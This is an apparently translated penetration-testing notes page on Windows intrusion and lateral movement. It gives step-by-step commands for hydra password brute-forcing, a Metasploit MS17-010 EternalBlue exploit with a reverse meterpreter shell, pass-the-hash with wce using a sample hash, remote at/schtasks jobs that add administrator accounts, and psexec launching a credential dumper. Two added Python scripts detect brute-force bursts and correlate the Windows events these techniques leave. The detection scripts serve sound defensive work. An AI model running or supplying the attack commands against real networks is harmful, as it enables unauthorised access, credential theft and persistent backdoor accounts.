Port Scan
Common ports and attacks
Specific scanning methods: click here to jump to my other article, which describes the use of port scanning tools in detail
Weak password scanning
Weak password scanning means trying weak passwords to log in to services such as MySQL, VNC, RDP and HTTP management interfaces. You can use weak password scanning tools such as xscan, hydra, medusa, nmap and so on, or find more and better tools yourself.
hydra
1. First scan with nmap to find out which ports are open
2. Use hydra to test the open ports for weak passwords
hydra -L user.txt -P pass.txt 192.168.16.137 smb (192.168.16.137 is the target IP, smb is the name of the service being tested)
-l specify a single username; -L specify a username dictionary; -p specify a single password; -P specify a password dictionary
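From the defender's side, a hydra run like the one above leaves a burst of failed logons from one source against one service, often across many usernames, followed by a success if a weak password was in the dictionary. The following script is an added example (not part of the original notes and not hydra's own code) that counts failures per (source, service) in a sliding time window and raises a higher-priority finding when a success follows a flagged burst. The log lines and their `timestamp service: RESULT login user= from=` format are constructed for the example; adapt `LINE_RE` to the real service's log format.

```python
"""Detect dictionary / weak-password attempts in authentication logs."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format for this example; real services (smb, rdp, mysql, vnc)
# each log differently, so this regex is the part you would adapt.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<service>\w+): "
    r"(?P<result>FAILED|SUCCESS) login user=(?P<user>\S+) from=(?P<src>[\d.]+)$"
)

# Constructed sample log (not real data): one source hammers smb with a small
# dictionary and eventually succeeds; a second source is an ordinary user typo.
SAMPLE_LOG = """\
2024-01-05 10:00:01 smb: FAILED login user=administrator from=192.168.16.137
2024-01-05 10:00:02 smb: FAILED login user=administrator from=192.168.16.137
2024-01-05 10:00:02 smb: FAILED login user=guest from=192.168.16.137
2024-01-05 10:00:03 smb: FAILED login user=backup from=192.168.16.137
2024-01-05 10:00:03 smb: FAILED login user=administrator from=192.168.16.137
2024-01-05 10:00:04 smb: FAILED login user=administrator from=192.168.16.137
2024-01-05 10:00:05 smb: SUCCESS login user=administrator from=192.168.16.137
2024-01-05 10:00:20 rdp: FAILED login user=alice from=192.168.16.50
2024-01-05 10:00:25 rdp: SUCCESS login user=alice from=192.168.16.50
"""


def parse(log_text):
    """Yield parsed events in log order, skipping lines that do not match."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # real logs are noisy; ignore unrelated lines
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
        yield ev


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return a list of findings, in log order.

    kind == "burst": at least `threshold` failures from one source against one
        service inside `window`; reported once per (source, service).
    kind == "success_after_burst": a successful logon from a source that was
        already flagged, i.e. the dictionary probably contained a valid password.
    """
    failures = defaultdict(deque)  # (src, service) -> deque of (ts, user)
    flagged = set()
    findings = []
    for ev in parse(log_text):
        key = (ev["src"], ev["service"])
        q = failures[key]
        while q and ev["ts"] - q[0][0] > window:  # expire failures outside the window
            q.popleft()
        if ev["result"] == "FAILED":
            q.append((ev["ts"], ev["user"]))
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                findings.append({
                    "kind": "burst", "src": ev["src"], "service": ev["service"],
                    "count": len(q), "users": sorted({u for _, u in q}),
                    "ts": ev["ts"],
                })
        elif key in flagged:
            # A success right after a burst is the finding to act on first:
            # a weak password was most likely found.
            findings.append({
                "kind": "success_after_burst", "src": ev["src"],
                "service": ev["service"], "user": ev["user"], "ts": ev["ts"],
            })
    return findings


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_LOG):
        print(f)
```

The `users` field of a burst finding distinguishes a single-account dictionary attack (one user) from a password spray (many users); both are produced by the `-L`/`-P` dictionary options described above.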
nmap scripts
The scripts are in the script directory under the nmap installation directory
Brute-force scripts: brute; vulnerability detection scripts: vuln
Usage
nmap -p <port the script targets> --script <script name> <target ip>
msfconsole
1. Enter msfconsole
2. Search for the module matching the vulnerability
search 17_010
3. List the available vulnerability scanner modules
use auxiliary/scanner/
4. Use the scanner module to find vulnerable machines in the specified network segment
use auxiliary/scanner/smb/smb_ms17_010
set threads 10
set rhosts <network segment to scan>/24
exploit
5. Select a vulnerable machine and use the corresponding exploit module
use exploit/windows/smb/ms17_010_eternalblue
set lhost <local ip>
set rhosts <target ip>/32
set payload windows/x64/meterpreter/reverse_tcp
exploit
Hash injection
Principle
The principle of hash injection is that a local or domain user's hash, obtained in advance, is injected into the local authentication process lsass.exe, so that it is as if that user had logged on to the local machine; at the same time, IPC logon can then be used to obtain privileges on the target machine. How to obtain the target machine's local or domain user hash is left to your own imagination; hash injection itself exists to deal with NTLM hashes that cannot be cracked.
Method
1. First use wce to obtain the hash values from a machine in the network; it does not matter if the password is too complex to crack
wce -l
2. In practice, many machines in a network use the same password (the same password produces the same hash value)
3. Try to log on to other machines with the obtained hash; a successful logon gives the same result as logging on with the account password
1. Get the target machine's hostname or domain name
ping -a <target ip>
2. Log on using the hash value obtained before; if no NTLM hash is available, use 0 instead
wce.exe -s Administrator:WIN-P68FLB30G1I:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942
3. Remotely access the target machine's default C drive share
dir \\<target ip>\c$
4. Map the target machine's C drive to the local machine
net use z: \\<target ip>\c$
Remote connection & execution
Add scheduled task
at scheduled tasks
Note
Use case: you have the target machine's account password but cannot connect via remote desktop
Requires the Task Scheduler service to be running on the target
1. Connect to the target machine remotely using the default IPC$ share
net use \\<target ip> /user:administrator <password>
2. Check the target machine's time
net time \\<target ip>
3. Add an at scheduled task to execute
3.1 Execute a command directly
at \\<target ip> <time> <command>
Example:
Create a user
at \\192.168.16.158 12:50 net user zs 123.com /add
Add the user to the Administrators group
at \\192.168.16.158 12:50 net localgroup administrators zs /add
3.2 Using a script
Create a bat file whose content creates a new user and adds it to the Administrators group
Copy the bat file to the target machine
copy 1.bat \\<target ip>\c$\1.bat
Add a scheduled task that runs this script
at \\<target ip> <time> <script path>
4. List all at tasks on the target machine
at \\192.168.16.158
Add a schtasks scheduled task to execute
Note
Use case: you have the target machine's account password but cannot connect via remote desktop
On systems newer than Windows 2003 the Task Scheduler service must be turned on before this can be used
1. Create a bat file whose content creates a new user and adds it to the Administrators group
2. Connect to the target machine remotely using the default IPC$ share
net use \\<target ip> /user:administrator <password>
3. Copy the bat file to the target machine
copy 1.bat \\<target ip>\c$\1.bat
4. Check the target machine's time
net time \\<target ip>
5. Enter the following schtasks command to add the scheduled task
schtasks /create /tn aa /tr <script path> /sc once /st <time> /S <target ip> /U <username> /P <password> /RU system
Adding /RU system runs the task as the SYSTEM user; it can also be omitted. The script path can be replaced with a single command.
6. Run the scheduled task directly instead of waiting for the scheduled time
schtasks /run /tn <task name> /s <target ip> /u <username> /p <password>
7. Delete the scheduled task
schtasks /F /delete /tn <task name> /s <target ip> /u <username> /p <password>
psexec remote execution
1. Upload the program from the local machine to the target
net use \\<target ip>\c$ /user:administrator <password>
copy wce.exe \\<target ip>\c$\
2. Run the program on the target machine
PsExec.exe \\<target ip> -accepteula -u <user> -p <password> <program to run>
The first run pops up a license dialog; passing the -accepteula parameter bypasses it
3. Use psexec's own parameter to upload a local program to the target machine; it is deleted automatically after execution
Psexec.exe \\<target ip> -u <user> -p <password> -c QuarksPwDump.exe -d
-c <[path]filename>: copy the file to the remote machine and run it (note: the file is deleted automatically when the run ends)
-d: do not wait for the program to finish and return
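Every technique in the hash injection, at/schtasks and psexec sections above leaves a recognisable event chain on the target: a network logon (Security event 4624, logon type 3, authentication package NTLM when the logon came from an injected hash), access to an administrative share such as C$ or ADMIN$ (5140), and then either a scheduled task creation (4698) or, for psexec, a service installation (System event 7045 with service name PSEXESVC). The script below is an added example (not part of the original notes and not code from any tool named here) that correlates those events per source/account inside a time window. The event records are constructed sample data and their field names (`ts`, `id`, `logon_type`, `auth`, `share`, `task`, `service`, `user`, `src`) are chosen for this example; map them from your SIEM's normalised fields.

```python
"""Correlate the Windows events left behind by hash logon, remote at/schtasks
and psexec activity into findings a defender can act on."""
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_SHARES = {"C$", "ADMIN$"}

# Constructed sample events (not real logs). The first four mirror the chain
# described in the notes; the last two are ordinary Kerberos file-share use.
EVENTS = [
    {"ts": "2024-01-05 12:45:01", "id": 4624, "logon_type": 3, "auth": "NTLM",
     "user": "administrator", "src": "192.168.16.137"},
    {"ts": "2024-01-05 12:45:02", "id": 5140, "share": r"\\*\C$",
     "user": "administrator", "src": "192.168.16.137"},
    {"ts": "2024-01-05 12:45:10", "id": 4698, "task": r"\At1",
     "user": "administrator", "src": "192.168.16.137"},
    {"ts": "2024-01-05 12:47:00", "id": 7045, "service": "PSEXESVC",
     "user": "administrator"},  # System log entry, carries no source IP
    {"ts": "2024-01-05 13:10:00", "id": 4624, "logon_type": 3, "auth": "Kerberos",
     "user": "alice", "src": "192.168.16.50"},
    {"ts": "2024-01-05 13:10:05", "id": 5140, "share": r"\\*\shared",
     "user": "alice", "src": "192.168.16.50"},
]


def is_admin_share(path):
    """True for C$, ADMIN$ or any drive-letter$ share, whatever the server prefix."""
    name = path.rsplit("\\", 1)[-1].upper()
    return name in ADMIN_SHARES or (len(name) == 2 and name[1] == "$")


def correlate(events, window=timedelta(minutes=10)):
    """Return findings in time order.

    psexec_service_install      : 7045 with service name PSEXESVC (high)
    ntlm_admin_share_access     : admin share opened after an NTLM network logon
                                  by the same source/account within `window` (medium)
    remote_task_via_admin_share : scheduled task created after that chain (high)
    """
    history = defaultdict(list)  # (src, user) -> recent (ts, event) pairs
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
        if ev["id"] == 7045:
            # Service installs have no source address; the service name alone
            # is a high-fidelity indicator for psexec.
            if ev.get("service", "").upper() == "PSEXESVC":
                findings.append({"kind": "psexec_service_install", "ts": ts,
                                 "user": ev["user"], "severity": "high"})
            continue
        key = (ev.get("src"), ev["user"])
        hist = [(t, e) for t, e in history[key] if ts - t <= window] + [(ts, ev)]
        history[key] = hist
        ntlm_logon = any(e["id"] == 4624 and e.get("logon_type") == 3
                         and e.get("auth") == "NTLM" for _, e in hist)
        admin_share = any(e["id"] == 5140 and is_admin_share(e["share"])
                          for _, e in hist)
        if ev["id"] == 5140 and is_admin_share(ev["share"]) and ntlm_logon:
            findings.append({"kind": "ntlm_admin_share_access", "ts": ts,
                             "src": ev["src"], "user": ev["user"],
                             "share": ev["share"], "severity": "medium"})
        elif ev["id"] == 4698 and ntlm_logon and admin_share:
            findings.append({"kind": "remote_task_via_admin_share", "ts": ts,
                             "src": ev["src"], "user": ev["user"],
                             "task": ev.get("task"), "severity": "high"})
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f)
```

The NTLM condition is what separates a hash-based logon from normal domain activity, which is Kerberos; tasks created by `at` are named `At1`, `At2` and so on, while `schtasks /create /tn aa` gives the name chosen by the operator, so the task name is reported but not used as a trigger.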